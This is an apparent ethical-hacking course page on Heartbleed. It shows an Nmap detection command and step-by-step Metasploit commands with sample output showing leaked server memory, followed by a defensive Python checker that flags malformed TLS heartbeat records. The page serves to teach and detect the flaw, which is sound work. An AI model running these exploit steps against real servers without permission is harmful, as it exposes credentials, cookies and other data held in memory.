Trojan Horse Security offers official testing and certification as a Certified Cyber Hacker (CCH).
HEARTBLEED
TROJAN HORSE SECURITY IS TEACHING THESE CONCEPTS FOR EDUCATIONAL PURPOSES ONLY. WE DO NOT CONDONE ILLEGAL HACKING. TROJAN HORSE SECURITY CONSULTANTS ARE HIRED AS ETHICAL HACKERS AT THE REQUEST OF ORGANIZATIONS WITH PERMISSION TO HACK THEIR NETWORKS AND SYSTEMS.
Heartbleed was one of those vulnerabilities that affected so many systems that it sent waves through the IT industry.
Heartbleed is very simple to exploit and can be very damaging.
The easiest way to find vulnerable systems is with Nmap. Run the following command on your Linux system:
# nmap -p 443 --script ssl-heartbleed <target(s)>
PORT STATE SERVICE
443/tcp open https
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
<snip>
As you can see, this has found a vulnerable system.
Next, to exploit this, launch Metasploit. Remember to start the database service!
# service postgresql start
/opt/metasploit/app# ./msfconsole
Once launched, use the following commands to use the Heartbleed module:
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > set VERBOSE TRUE
VERBOSE => TRUE
msf auxiliary(openssl_heartbleed) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf auxiliary(openssl_heartbleed) > run
[*] 192.168.1.1:443 - Sending Client Hello...
[*] 192.168.1.1:443 - Sending Heartbeat...
[*] 192.168.1.1:443 - Heartbeat response, checking if there is data leaked...
[+] 192.168.1.1:443 - Heartbeat response with leak
[*] 192.168.1.1:443 - Printable info leaked:
@SKO0'94wiW*G):[f"!98532ED/Ait/537.36 (KHTML, like Gecko)
Chrome/34.0.1847.116 Safari/537.36Accept
<snip>
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
You will notice here that Metasploit communicated with the server and was able to pull data from the server's memory. The important thing to note is that the data it pulls is arbitrary: whatever happened to sit in the server's memory at that moment. There is no guarantee that you will find account credentials, session cookies or other critical data every time you run this; the danger is that it can expose sensitive data.
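Why the server hands back memory it never meant to send, as an added example that is not part of the original course material: a TLS heartbeat request declares its own payload length, and vulnerable OpenSSL builds copied that many bytes into the reply without checking that the bytes had actually arrived. The checker below parses one TLS Heartbeat record and applies the length test from the OpenSSL fix (declared payload plus 16 bytes of padding must fit inside the record); the two sample records are constructed for this example, not captured traffic.

```python
import struct

HEARTBEAT_CONTENT_TYPE = 0x18   # TLS record type for the Heartbeat extension (RFC 6520)
HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
MIN_PADDING = 16                # RFC 6520 requires at least 16 bytes of padding


def parse_heartbeat_record(record: bytes) -> dict:
    """Validate the Heartbeat message inside a single TLS record.

    Returns a dict with 'ok' (True when the lengths are consistent), the declared
    payload_length, the number of payload bytes actually available, and a reason.
    The length test is the one added to OpenSSL 1.0.1g:
    1 (type) + 2 (payload_length) + payload_length + 16 (padding) <= record length.
    """
    if len(record) < 5:
        return {"ok": False, "reason": "truncated TLS record header"}
    content_type, _version, record_len = struct.unpack("!BHH", record[:5])
    body = record[5:5 + record_len]          # trailing bytes (next record) are ignored
    if content_type != HEARTBEAT_CONTENT_TYPE:
        return {"ok": False, "reason": "not a heartbeat record"}
    if len(body) < record_len:
        return {"ok": False, "reason": "record shorter than its declared length"}
    if record_len < 3:
        return {"ok": False, "reason": "heartbeat message too short"}
    hb_type, payload_len = struct.unpack("!BH", body[:3])
    if hb_type not in (HEARTBEAT_REQUEST, HEARTBEAT_RESPONSE):
        return {"ok": False, "reason": "unknown heartbeat type"}
    available = record_len - 3               # bytes after type + payload_length
    # The Heartbleed check: a vulnerable server skipped this and echoed
    # payload_len bytes from wherever the request sat in memory.
    if 1 + 2 + payload_len + MIN_PADDING > record_len:
        return {"ok": False, "declared": payload_len, "available": available,
                "reason": "payload_length exceeds record: Heartbleed-style over-read"}
    return {"ok": True, "declared": payload_len, "available": available,
            "reason": "consistent"}


# Constructed sample records (not captured traffic): TLS 1.1 heartbeat requests
# carrying the 4-byte payload b"ping" followed by 16 bytes of padding.
BENIGN_RECORD = (b"\x18\x03\x02\x00\x17"              # type 0x18, version 3.2, length 23
                 + b"\x01\x00\x04" + b"ping" + b"\x00" * 16)   # declares 4 bytes
MALFORMED_RECORD = (b"\x18\x03\x02\x00\x17"
                    + b"\x01\x40\x00" + b"ping" + b"\x00" * 16)  # declares 16384 bytes

if __name__ == "__main__":
    for name, rec in (("benign", BENIGN_RECORD), ("malformed", MALFORMED_RECORD)):
        print(name, parse_heartbeat_record(rec))
```

The same test can be run over heartbeat records pulled from a packet capture to flag Heartbleed probes against hosts that the Nmap script has already reported as vulnerable.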